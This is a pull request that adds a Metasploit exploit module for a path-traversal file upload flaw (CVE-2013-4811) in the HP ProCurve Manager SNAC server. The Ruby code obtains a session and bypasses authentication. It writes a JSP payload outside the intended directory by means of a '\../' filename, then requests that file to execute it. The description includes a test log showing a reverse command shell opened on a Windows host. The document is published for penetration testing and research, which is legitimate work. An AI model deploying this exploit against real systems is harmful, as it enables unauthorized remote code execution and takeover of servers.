### PR TITLE
Add module for ZDI-13-226

### DIFF
--- a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb
+++ b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb
@@ -1,0 +1,138 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload',
+      'Description'    => %q{
+        This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The
+        vulnerability, on the UpdateDomainControllerServlet, allows an attacker to upload arbitrary
+        files, just having into account binary writes aren't allowed. Additionally, authentication
+        can be bypassed in order to upload the file. This module has been tested successfully on
+        the SNAC server installed with HP ProCurve Manager 4.0.
+      },
+      'Author'         =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-4811' ],
+          [ 'OSVDB', '97154' ],
+          [ 'BID', '62349' ],
+          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-226/' ]
+        ],
+      'Privileged'     => true,
+      'Platform'       => 'win',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+        },
+      'DisclosureDate' => 'Sep 09 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(443)
+      ], self.class )
+  end
+
+  def check
+    session = get_session
+    if session.nil?
+      return Exploit::CheckCode::Safe
+    end
+
+    res = send_request_cgi({
+      'uri' => "/RegWeb/RegWeb/GetDomainControllerServlet",
+      'cookie' => session
+    })
+
+    if res and res.code == 200 and res.body =~ /domainName/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def get_session
+    res = send_request_cgi({ 'uri' => "/RegWeb/html/snac/index.html" })
+    session = nil
+    if res and res.code == 200
+      session = res.get_cookies
+    end
+
+    if session and not session.empty?
+      return session
+    end
+
+    return nil
+  end
+
+  def exploit_upload(session)
+    jsp_name = "#{rand_text_alphanumeric(8+rand(8))}.jsp"
+    post_message = Rex::MIME::Message.new
+    post_message.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"adCert\"; filename=\"\\../#{jsp_name}\"")
+    post_message.add_part("{}", nil, nil, "form-data; name=\"ad_data\"")
+    post_message.add_part("add", nil, nil, "form-data; name=\"ad_action\"")
+    data = post_message.to_s
+    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
+
+    res = send_request_cgi(
+      {
+        'uri'    => "/RegWeb/RegWeb/UpdateDomainControllerServlet",
+        'method' => 'POST',
+        'ctype'    => "multipart/form-data; boundary=#{post_message.bound}",
+        'cookie' => session,
+        'data'    => data,
+      })
+
+    if res and res.code == 200 and res.body =~ /success:false/
+      return jsp_name
+    end
+
+    return nil
+  end
+
+  def peer
+    return "#{rhost}:#{rport}"
+  end
+
+  def exploit
+    print_status("#{peer} - Getting a valid session...")
+    session = get_session
+    if session.nil?
+      fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session")
+    end
+
+    print_status("#{peer} - Uploading payload...")
+    jsp = exploit_upload(session)
+    unless jsp
+      fail_with(Failure::NotVulnerable, "#{peer} - Upload failed")
+    end
+
+    print_status("#{peer} - Executing payload...")
+    send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" })
+  end
+
+end


### PR DESCRIPTION
Tested with the SNAC server included with HP PCM 4.0

```
msf exploit(hp_pcm_snac_update_domain) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.244:443 - Getting a valid session...
[*] 192.168.172.244:443 - Uploading payload...
[*] 192.168.172.244:443 - Executing payload...
[*] Command shell session 2 opened (192.168.172.1:4444 -> 192.168.172.244:2541) at 2013-09-13 17:31:16 -0500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Hewlett-Packard\PCM\snac\bin>exit

[*] 192.168.172.244 - Command shell session 2 closed.  Reason: Died from EOFError

msf exploit(hp_pcm_snac_update_domain) > check
[*] The target appears to be vulnerable.

```
